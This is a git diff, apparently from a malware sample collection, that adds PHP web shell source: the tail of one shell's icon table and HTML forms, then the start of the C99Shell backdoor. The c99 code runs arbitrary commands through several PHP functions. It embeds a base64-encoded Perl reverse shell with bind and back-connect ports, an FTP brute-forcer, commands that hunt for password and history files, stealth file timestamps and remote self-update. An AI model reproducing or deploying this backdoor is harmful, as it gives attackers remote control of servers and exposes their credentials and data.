+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARKMMlJq704620AQlMQAABlFMAwlIEgEESZnKg6tEJwwOVZ". +"IjfXKLHryRK4oaRDJByQwlQP1SQkUypAgdpsDYErruRAOpaPm7Q6HQEAOw==", +"ext_pcx"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pif"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEO/DISasEOGuNDkJMeDDjGH7HpmYd9jwazKUybG+tvOlA7gK1mYv3w7RW". +"mJRRiRQ2Z5+odNqxWK/YrDUCADs=", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_png"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_reg"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgACAgMDAwAD//wAAAAAAAANM". +"aCrcrtCIQCslIkprScjQxFFACYQO053SMASFC6xSEQCvvAr2gMuzCgEwiZlwwQtRlkPuej2nkAh7". +"GZPK43E0DI1oC4J4TO4qtOhSAgA7", +"ext_rev"=> +"R0lGODlhEAAQAFUAACH5BAEAAD8ALAAAAAAQABAAhQAAAOvz+////1gdAFAAANDY4IYCU/9aZJIC". +"Wtvi7PmyheLq8xE2AAAyUNTc5DIyMr7H09jf5/L5/+Dg8PX6/4SHl/D4/5OXpKGmse/2/ZicqPb6". +"/28aIBlOAMHI0MzU3MXFHjJQAOfu9d7k7gA4Xv//sRVDAI0GUY0CU+Hn8ABbjfFwOABMfwhfL/99". +"0v+H1+hatf9syvRjwP+V3gA4boCAAABQhf+j5f++8P950FBQAN/n8PD2/HNzAABilgAAAAaRwIFw". +"SCz+MJpLhdMzOJ9PAqRQmJxKuNvs5crFZDBCwSIQcECItDqNIlAkGcejRqjb74C8fs8/JiskLD4e". +"BRERCSMpIg1TVTYqAZGRPBsCCw1jZTSVZZ0CAZdvcQ+SBwqfn5d8pacBqX5KJgEHtAcrrTsMjRM6". +"rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7", +"ext_rmi"=> +"R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS". +"OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk". +"QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7", +"ext_rtf"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_shtm"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc". +"ETbgR3aZmrIlVgAAOw==", +"ext_shtml"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc". +"ETbgR3aZmrIlVgAAOw==", +"ext_so"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_stl"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_sys"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_theme"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA". +"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_url"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7". +"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk". +"fRQRADs=", +"ext_vbe"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH". +"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16". +"seAwLAEAOw==", +"ext_vbs"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ". +"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY". +"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==", +"ext_vcf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//". +"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4". +"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7", +"ext_wav"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wma"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wmf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7", +"ext_xsl"=> +"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA". +"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh". +"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD". +"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==" +); +$imgequals = array( +"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), +"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"), +"ext_htaccess"=>array("ext_htaccess","ext_htpasswd") +); + ksort($arrimg); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) + { + if (in_array($img,$v)) {$img = $k;} + } + if (empty($arrimg[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($arrimg[$img]); + } + else + { + echo "
    "; + $k = array_keys($arrimg); + foreach ($k as $u) + { + echo $u.":
    "; + } + echo "
    "; + } + exit; +} +if ($act == "about") +{ + $data = "Any stupid copyrights and copylefts"; + echo $data; +} + +$microtime = round(getmicrotime()-$starttime,4); +?> +
    + + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + + + + + +

    :: Search ::

      - regexp 

    :: Upload ::

    +  


    +

    :: Make Dir ::

     

    :: Make File ::

     

    +

    --[ + PHP Shell v. © powered by + T.H.G Security Team | + http://www.clubza.net | Generation time: ]--

    +
    + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.h b/PHP/Backdoor.PHP.C99Shell.h new file mode 100644 index 00000000..4fb90bb3 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.h @@ -0,0 +1,3284 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #16"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "c99shell v.".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
    C99 Modified By Psych0
    "; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} +$dizin = str_replace("\\\\","\\",$dizin); +$dizinispd = htmlspecialchars($dizin); +/*dizin*/ +$real = realpath($dizinispd); +$path = basename ($PHP_SELF); +function dosyayicek($link,$file) +{ + $fp = @fopen($link,"r"); + while(!feof($fp)) + { + $cont.= fread($fp,1024); + } + fclose($fp); + + $fp2 = @fopen($file,"w"); + fwrite($fp2,$cont); + fclose($fp2); +} + + + + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Tools",$surl."act=tools&d=%d"), + array("Proc.",$surl."act=processes&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Sec.",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=eval&d=%d"), + array("Update",$surl."act=update&d=%d"), + array("Feedback",$surl."act=feedback&d=%d"), + array("Self remove",$surl."act=selfremove"), + array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function err($n,$txt='') +{ +echo '
    '; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '
    '; +return null; +} +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); 